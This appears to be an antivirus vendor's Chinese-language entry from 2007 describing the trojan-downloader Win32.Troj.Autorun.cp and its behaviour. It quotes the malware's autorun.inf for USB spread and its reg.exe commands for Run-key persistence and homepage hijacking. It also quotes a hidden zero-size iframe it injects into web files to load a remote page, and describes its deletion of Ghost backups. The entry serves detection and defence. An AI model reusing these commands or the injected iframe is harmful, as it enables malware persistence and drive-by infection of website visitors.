Win32.Troj.Autorun.cp

病毒别名： 处理时间：2007-06-22 威胁级别：★

中文名称：疾行者 病毒类型：木马 影响系统：Win 9x/ME,Win 2000/NT,Win XP,Win 2003

病毒行为:

这是一个木马下载病毒，该病毒会删除被感染机器上的ghost备份文件，并且尝试感染脚本文件，尝试通过U盘传播把病毒本身传播出去。链接指定网址，下载其他木马程序。

1.%system%SVSH0ST.EXE

%system%Autorun.inf

2.病毒把本身拷贝到每个盘符下面并且命名为来lcg.exe，并且创建autorun.inf文件，内容如下：

[AutoRun]

open=lcg.exe

shellopen=打开(&O)

shellopenCommand=lcg.exe

shellopenDefault=1

shellexplore=资源管理器(&X)

shellexploreCommand=lcg.EXE

3.创建互斥量"niux"

3.运行创建进程运行下面的命令：

reg.exe

"ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V svchost /T REG_SZ /D "

"ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V svchost /T REG_SZ /D C:\WINNT\System32\SVSH0ST.EXE /F"

"add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f"

"add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f"

4.枚举所有当前窗口，如果发现窗口信息中含有以下字符，就关闭该窗口：

"病毒"

5.遍历所有的盘符，如果文件后缀名为.GHO文件(ghost备份文件)，则删除该文件，如果文件名中含有以下的

INDEX.ASP

.HTM

INDEX.PHP

DEFAULT.ASP

DEFAULT.PHP

CONN.ASP

之一的责尝试在文件末尾插入代码：

<ｉｆｒａｍｅ src=http://*/test.htm width=0 height=0></ｉｆｒａｍｅ>